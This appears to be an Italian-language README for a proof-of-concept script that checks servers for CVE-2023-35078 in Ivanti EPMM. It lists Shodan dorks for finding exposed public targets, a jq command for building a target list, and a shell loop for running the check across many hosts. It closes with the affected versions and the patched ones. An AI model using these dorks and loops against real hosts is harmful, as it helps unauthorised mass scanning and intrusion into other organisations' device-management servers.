
Script proof of concept per verificare se il sito è vulnerabile a CVE-2023-35078
Puoi usare i seguenti dork di shodan per trovare target pubblici.
http.favicon.hash:362091310http.favicon.hash:545827989path=/mifsPuoi usare quanto segue per trasformare i dati dell'API di shodan in un formato adatto allo script di verifica:
jq -cr 'select(.http.favicon.hash == 362091310) | [ if .ssl? then "https://" else "http://" end , (.ip_str) + ":" + (.port|tostring)] | add' example.json > your_data_file.txt
./CVE-2023-35078.sh http[s]://your.target:port (definisci sia il protocollo che la porta del target)Se vuoi testare più target, puoi semplicemente racchiuderli in un ciclo:
while read line; do ./CVE-2023-35078.sh $line; done < your_data_file.txt
Questa vulnerabilità ha impatto su tutte le versioni supportate – Versioni 11.4, release 11.10, 11.9 e 11.8. Anche versioni/release precedenti sono a rischio.
puoi risolvere la vulnerabilità aggiornando alle versioni EPMM 11.8.1.1, 11.9.1.1 e 11.10.0.2. Queste versioni corrette coprono anche le versioni software non supportate e giunte a fine vita (End-of-Life, EoL) precedenti alla 11.8.1.0.